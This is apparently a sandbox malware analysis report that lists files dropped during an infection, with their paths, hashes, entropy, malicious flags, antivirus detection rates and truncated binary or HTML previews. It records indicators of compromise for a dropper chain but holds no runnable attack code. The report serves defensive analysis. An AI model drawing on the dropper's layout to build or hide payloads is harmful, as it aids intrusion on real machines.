                                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rh33ilmf.fdn.psm1

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rhpsz4r1.gxo.psm1

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_znt5400f.utx.ps1

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\nsb5ABC.tmp

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Users\user\Pictures\gIvDEh2BZp9B1K9gi8nXHxAG.exe
                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):31510
                                                                                                                                                                                                                                                            Entropy (8bit):6.3445840488112815
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:768:bo1hyLjc5S8EIChzUexhPnvXiIpCNY1I1t:bAAHSSueIe7vXP6b
                                                                                                                                                                                                                                                            MD5:BFBB9D45E6A3213933DDFEC2B4ECB207
                                                                                                                                                                                                                                                            SHA1:AB9704ECE0E6749A944BDF1399E0323ADB6A3D3C
                                                                                                                                                                                                                                                            SHA-256:7DDDF636749005EDC2D0BF708955F91DC566B3394D2A5D50340D52AF4C5BE87A
                                                                                                                                                                                                                                                            SHA-512:A68E4A7EBA3203F29CF38346296141DC48064276FD84EAC52EF57D424E7B3F7D1CB7E95D17A44265C9A1D9E8497FE65E7A7B059C2399C795DFF6DA0F420583AB
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:;.......,...................)...........U.......;...............................................................................................................................................................................................................................................................g...............................................................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\nsh1C9B.tmp\INetC.dll

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exe
                                                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):22016
                                                                                                                                                                                                                                                            Entropy (8bit):5.666921368237103
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:384:KOoVVefeWsI7rsIquPLNN546o0Ac9khYLMkIX0+Gzyekv:4VVaeE7wIqyJN5i
                                                                                                                                                                                                                                                            MD5:2B342079303895C50AF8040A91F30F71
                                                                                                                                                                                                                                                            SHA1:B11335E1CB8356D9C337CB89FE81D669A69DE17E
                                                                                                                                                                                                                                                            SHA-256:2D5D89025911E2E273F90F393624BE4819641DBEE1606DE792362E442E54612F
                                                                                                                                                                                                                                                            SHA-512:550452DADC86ECD205F40668894116790A456FE46E9985D68093D36CF32ABF00EDECB5C56FF0287464A0E819DB7B3CC53926037A116DE6C651332A7CC8035D47
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9<.EXR.EXR.EXR.b.).LXR.EXS..XR.b. .FXR.b.(.DXR.b...DXR.b.*.DXR.RichEXR.................PE..L....T.[...........!.....8...P......I?.......P...................................................................... G..l....?..d.......(...............................................................................P............................text....7.......8.................. ..`.data....<...P.......<..............@....rsrc...(............D..............@..@.reloc...............N..............@..B........................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\nsi45BD.tmp

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Users\user\Pictures\yzAPe25HGnxqbkafYprXvqQ2.exe
                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):31510
                                                                                                                                                                                                                                                            Entropy (8bit):6.3445840488112815
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:768:bo1hyLjc5S8EIChzUexhPnvXiIpCNY1I1t:bAAHSSueIe7vXP6b
                                                                                                                                                                                                                                                            MD5:BFBB9D45E6A3213933DDFEC2B4ECB207
                                                                                                                                                                                                                                                            SHA1:AB9704ECE0E6749A944BDF1399E0323ADB6A3D3C
                                                                                                                                                                                                                                                            SHA-256:7DDDF636749005EDC2D0BF708955F91DC566B3394D2A5D50340D52AF4C5BE87A
                                                                                                                                                                                                                                                            SHA-512:A68E4A7EBA3203F29CF38346296141DC48064276FD84EAC52EF57D424E7B3F7D1CB7E95D17A44265C9A1D9E8497FE65E7A7B059C2399C795DFF6DA0F420583AB
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:;.......,...................)...........U.......;...............................................................................................................................................................................................................................................................g...............................................................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\nsj1650.tmp

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exe
                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):2058827
                                                                                                                                                                                                                                                            Entropy (8bit):7.311106428499921
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:49152:kt+UnaQiKJ8N+AadA6mICFhNGffVCPi9NUko6jE:kdwKa+u6mICFSwPKDK
                                                                                                                                                                                                                                                            MD5:76EA3092A24A2D701C7B5EEAB6EAC8DA
                                                                                                                                                                                                                                                            SHA1:754EFB544469B7FD2C94733C69966709DF302F17
                                                                                                                                                                                                                                                            SHA-256:CC75380982E895BCBA601E701542CE0ADAFD18353F52D7ACEB3FACDE13FD14BF
                                                                                                                                                                                                                                                            SHA-512:44DE7AF44A7E24E8A96291813D8CB3726E2938C0AE282DC8D15DFE2F4092898F7DE92B1C666126908E23146E4A08B587C4C53F0F68845723C8D425BEF7FE5198
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:;.......,...................)...........U.......;...............................................................................................................................................................................................................................................................g...............................................................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\nsn52DC.tmp

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Users\user\Pictures\RC2DCMOzLtOY3PfjMU0omeEi.exe
                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):31510
                                                                                                                                                                                                                                                            Entropy (8bit):6.3445840488112815
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:768:bo1hyLjc5S8EIChzUexhPnvXiIpCNY1I1t:bAAHSSueIe7vXP6b
                                                                                                                                                                                                                                                            MD5:BFBB9D45E6A3213933DDFEC2B4ECB207
                                                                                                                                                                                                                                                            SHA1:AB9704ECE0E6749A944BDF1399E0323ADB6A3D3C
                                                                                                                                                                                                                                                            SHA-256:7DDDF636749005EDC2D0BF708955F91DC566B3394D2A5D50340D52AF4C5BE87A
                                                                                                                                                                                                                                                            SHA-512:A68E4A7EBA3203F29CF38346296141DC48064276FD84EAC52EF57D424E7B3F7D1CB7E95D17A44265C9A1D9E8497FE65E7A7B059C2399C795DFF6DA0F420583AB
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:;.......,...................)...........U.......;...............................................................................................................................................................................................................................................................g...............................................................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\nst211E.tmp

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Users\user\Pictures\BTnjKpTBDzKtQo69b5SrwYDx.exe
                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):31510
                                                                                                                                                                                                                                                            Entropy (8bit):6.3445840488112815
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:768:bo1hyLjc5S8EIChzUexhPnvXiIpCNY1I1t:bAAHSSueIe7vXP6b
                                                                                                                                                                                                                                                            MD5:BFBB9D45E6A3213933DDFEC2B4ECB207
                                                                                                                                                                                                                                                            SHA1:AB9704ECE0E6749A944BDF1399E0323ADB6A3D3C
                                                                                                                                                                                                                                                            SHA-256:7DDDF636749005EDC2D0BF708955F91DC566B3394D2A5D50340D52AF4C5BE87A
                                                                                                                                                                                                                                                            SHA-512:A68E4A7EBA3203F29CF38346296141DC48064276FD84EAC52EF57D424E7B3F7D1CB7E95D17A44265C9A1D9E8497FE65E7A7B059C2399C795DFF6DA0F420583AB
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:;.......,...................)...........U.......;...............................................................................................................................................................................................................................................................g...............................................................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\nsw3523.tmp

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Users\user\Pictures\yq7sRYx0zxf2nUHNI8myIvQb.exe
                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):31510
                                                                                                                                                                                                                                                            Entropy (8bit):6.3445840488112815
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:768:bo1hyLjc5S8EIChzUexhPnvXiIpCNY1I1t:bAAHSSueIe7vXP6b
                                                                                                                                                                                                                                                            MD5:BFBB9D45E6A3213933DDFEC2B4ECB207
                                                                                                                                                                                                                                                            SHA1:AB9704ECE0E6749A944BDF1399E0323ADB6A3D3C
                                                                                                                                                                                                                                                            SHA-256:7DDDF636749005EDC2D0BF708955F91DC566B3394D2A5D50340D52AF4C5BE87A
                                                                                                                                                                                                                                                            SHA-512:A68E4A7EBA3203F29CF38346296141DC48064276FD84EAC52EF57D424E7B3F7D1CB7E95D17A44265C9A1D9E8497FE65E7A7B059C2399C795DFF6DA0F420583AB
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:;.......,...................)...........U.......;...............................................................................................................................................................................................................................................................g...............................................................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\nsz16FC.tmp

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Users\user\Pictures\3BiVM2uOsvGVXA1BoDorVuCU.exe
                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):31510
                                                                                                                                                                                                                                                            Entropy (8bit):6.3445840488112815
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:768:bo1hyLjc5S8EIChzUexhPnvXiIpCNY1I1t:bAAHSSueIe7vXP6b
                                                                                                                                                                                                                                                            MD5:BFBB9D45E6A3213933DDFEC2B4ECB207
                                                                                                                                                                                                                                                            SHA1:AB9704ECE0E6749A944BDF1399E0323ADB6A3D3C
                                                                                                                                                                                                                                                            SHA-256:7DDDF636749005EDC2D0BF708955F91DC566B3394D2A5D50340D52AF4C5BE87A
                                                                                                                                                                                                                                                            SHA-512:A68E4A7EBA3203F29CF38346296141DC48064276FD84EAC52EF57D424E7B3F7D1CB7E95D17A44265C9A1D9E8497FE65E7A7B059C2399C795DFF6DA0F420583AB
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:;.......,...................)...........U.......;...............................................................................................................................................................................................................................................................g...............................................................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\nsz4928.tmp

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Users\user\Pictures\BitVM4h79HXjwHpz9WBgoxJI.exe
                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):31510
                                                                                                                                                                                                                                                            Entropy (8bit):6.3445840488112815
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:768:bo1hyLjc5S8EIChzUexhPnvXiIpCNY1I1t:bAAHSSueIe7vXP6b
                                                                                                                                                                                                                                                            MD5:BFBB9D45E6A3213933DDFEC2B4ECB207
                                                                                                                                                                                                                                                            SHA1:AB9704ECE0E6749A944BDF1399E0323ADB6A3D3C
                                                                                                                                                                                                                                                            SHA-256:7DDDF636749005EDC2D0BF708955F91DC566B3394D2A5D50340D52AF4C5BE87A
                                                                                                                                                                                                                                                            SHA-512:A68E4A7EBA3203F29CF38346296141DC48064276FD84EAC52EF57D424E7B3F7D1CB7E95D17A44265C9A1D9E8497FE65E7A7B059C2399C795DFF6DA0F420583AB
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:;.......,...................)...........U.......;...............................................................................................................................................................................................................................................................g...............................................................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\syncUpd.exe

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exe
                                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):203776
                                                                                                                                                                                                                                                            Entropy (8bit):6.483720128795738
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3072:9HPjz1hW1Avw3tBoSWJ7EeL661Q/RQlTZ5rnupqg8:dPVhWXopEeOjGlTZ0M
                                                                                                                                                                                                                                                            MD5:DBA6DB51EA13E585AEE6136021836641
                                                                                                                                                                                                                                                            SHA1:591B41E2249CC40A9523680A2D1B162BA238C0D8
                                                                                                                                                                                                                                                            SHA-256:6223C0847ECDB1F05B88FAFE144AEE708E65933E094C70016EA51F3D2B89BC81
                                                                                                                                                                                                                                                            SHA-512:8201C37ADA5306AEBE6F87CE8967F1FC4C85A6105B5851EC0204A5538F54B9223637DADCFB64F81AB40B8C001C6ECAEBDB90E62BF7734E41C4B540CA141B4F98
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 29%
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........E^.q+..q+..q+......q+......q+......q+......q+..q*..q+......q+......q+......q+.Rich.q+.........PE..L......c..........................................@...........................#.................................................(....@...w..............................................................................L............................text...t........................... ..`.rdata..v...........................@..@.data... ........(...|..............@....rsrc....g...@...x..................@..@................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\wfplwfs.exe

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exe
                                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):237568
                                                                                                                                                                                                                                                            Entropy (8bit):6.018958492459831
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3072:xu14403Cgega/YYn13VguOBft5QRt15VbvVXbz1:A144/getAfQZfbNrJ
                                                                                                                                                                                                                                                            MD5:ED7321DFC04F801D87AB2F3B4ABCB8FB
                                                                                                                                                                                                                                                            SHA1:93A73A1679265A71E42A4D4F7DB2099EF109DF85
                                                                                                                                                                                                                                                            SHA-256:9537BAD08DE11149D3EA8528EE94E9FEB7927D69E933315357D3F466312ADE3E
                                                                                                                                                                                                                                                            SHA-512:D5CC6E876EF7B05EC4A18C20C3D2E600247B35D69D0DC9F4576408BE781C127DDE22C7220C6CEB83987D6C07380A6240EFA6B82ED8C750E6E32F14DA2DCE1F89
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 47%
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........n..w=..w=..w=.^.=..w=.^.=..w=.^.=.w=.d=..w=t.(=..w=t.*=..w=..v=).w=.^.=..w=.^.=..w=.^.=..w=Rich..w=........PE..L...N..e.............................[............@.........................................................................$...........................................................................@...............<............................text............................... ..`.rdata..H...........................@..@.data....,....... ..................@....rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Tll62OaP8oVLTcLcTrzOXqGl.exe

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):1878244
                                                                                                                                                                                                                                                            Entropy (8bit):7.926614829163194
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:49152:tIiiK2SE+8PR3K9gVDrtKfeKfgErtpX2cvwgx:qiiK2IWRakDrNfExpGcvwgx
                                                                                                                                                                                                                                                            MD5:BD90ED9339BF690DAF83101CAA9EC91A
                                                                                                                                                                                                                                                            SHA1:B43B709F8D8A4FA4261B9535D1601860F9715E39
                                                                                                                                                                                                                                                            SHA-256:5BF81D9E8AA02DD01EF83000DF2EDDEFB54D71AA7033773D699D5963D5DE75E4
                                                                                                                                                                                                                                                            SHA-512:BB4807A1887A7DFB65729E740216064FAE2C03684429E51E28801182012B1404CF35378B5714A2799696C6CD68CACB92D8270B93583E755E1474DF0444526DF7
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..... W............................uC............@........................................... .................................|....p...............................................................................................................text...$........................... .0`.data...............................@.`..rdata..8j.......l..................@.`@.bss......... ........................`..idata..|...........................@.0..ndata..............................@.`..rsrc........p......................@.0.........................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\UVLurWz0zwkQqd3HayB6HEY3.exe

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (414)
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):3612
                                                                                                                                                                                                                                                            Entropy (8bit):4.591439924230012
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:48:QUnvbGa6TDZzmQiNqcBkVEfriDe1lLfifMMT+CXDuHX3c:RvbGRTihhL6HXYc
                                                                                                                                                                                                                                                            MD5:30B1B56E37A9DBE68B65CD002F85D36D
                                                                                                                                                                                                                                                            SHA1:176F8A38FD3E45B5FF45E4DB000CE6F3FBFA1429
                                                                                                                                                                                                                                                            SHA-256:013905AD9E37F10028A4671291A0A93625CCCF97DB4D7626436F9D7B27CD6C19
                                                                                                                                                                                                                                                            SHA-512:4A871D5340B6B1F096F8093522E8E6C32BE11D730E82BF01CD9EF2F3495B950134B34295524B4CB00981935AB4142151DA0606ED7348026491CFBC0C367E864C
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:<!DOCTYPE html>.<html lang="en" class="h-100 scroll-behavior-smooth " dir="ltr">.<head>. <meta charset="utf-8">. <meta name="viewport" content="width=device-width, initial-scale=1">.. CSRF Token -->. <meta name="csrf-token" content="Llm9550BrFyiyZYo8WnXrIGIjMrygTdhLRy8sNWJ">.. <title>Link disabled</title>.. <meta name="robots" content="noindex">.. <link href="https://shortiny.com/uploads/brand/favicon.png" rel="icon">.. Scripts -->. <script src="https://shortiny.com/js/app.js" defer></script>.. Styles -->. <link href="https://shortiny.com/css/app.css" rel="stylesheet" data-theme-light="https://shortiny.com/css/app.css" data-theme-dark="https://shortiny.com/css/app.dark.css" data-theme-target="href">.. . <style>. @import url("https://rsms.me/inter/inter.css");. </style>. </head>. <body class="d-flex flex-column">. <div class="bg-base-1 d-flex align-items-center flex-fill">. <div class="cont

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\UbeikbXa4CwwIN3M94pDVFss.exe

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):1878244
                                                                                                                                                                                                                                                            Entropy (8bit):7.926614829163194
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:49152:tIiiK2SE+8PR3K9gVDrtKfeKfgErtpX2cvwgx:qiiK2IWRakDrNfExpGcvwgx
                                                                                                                                                                                                                                                            MD5:BD90ED9339BF690DAF83101CAA9EC91A
                                                                                                                                                                                                                                                            SHA1:B43B709F8D8A4FA4261B9535D1601860F9715E39
                                                                                                                                                                                                                                                            SHA-256:5BF81D9E8AA02DD01EF83000DF2EDDEFB54D71AA7033773D699D5963D5DE75E4
                                                                                                                                                                                                                                                            SHA-512:BB4807A1887A7DFB65729E740216064FAE2C03684429E51E28801182012B1404CF35378B5714A2799696C6CD68CACB92D8270B93583E755E1474DF0444526DF7
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..... W............................uC............@........................................... .................................|....p...............................................................................................................text...$........................... .0`.data...............................@.`..rdata..8j.......l..................@.`@.bss......... ........................`..idata..|...........................@.0..ndata..............................@.`..rsrc........p......................@.0.........................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\VeFiHaAJqD2MVtOotjaLLiHl.exe

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (414)
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):3612
                                                                                                                                                                                                                                                            Entropy (8bit):4.589697665627802
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:48:Q8vbGa6TDZzmQiNqcBkVEfriDe1lLfifMMT+CXDuHX3c:RbGRTihhL6HXYc
                                                                                                                                                                                                                                                            MD5:4F2CD595BBAAF3441F16DDEC2A160A17
                                                                                                                                                                                                                                                            SHA1:9582812FA4B03CCF57BF70167A66E14188C00379
                                                                                                                                                                                                                                                            SHA-256:5407ACA1D7782DFBC044E339250AB2F7F3FFD350CF46755C47EE08245D3982AE
                                                                                                                                                                                                                                                            SHA-512:75CE9411C009B0C104109D5C10B7F13266F00689CB4AC3BFB82F83FF68C2BFC594A5FA361E154B34A14AB895F8AEDC74E6B8CFA8B2CB5154CCD178270A124F2C
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
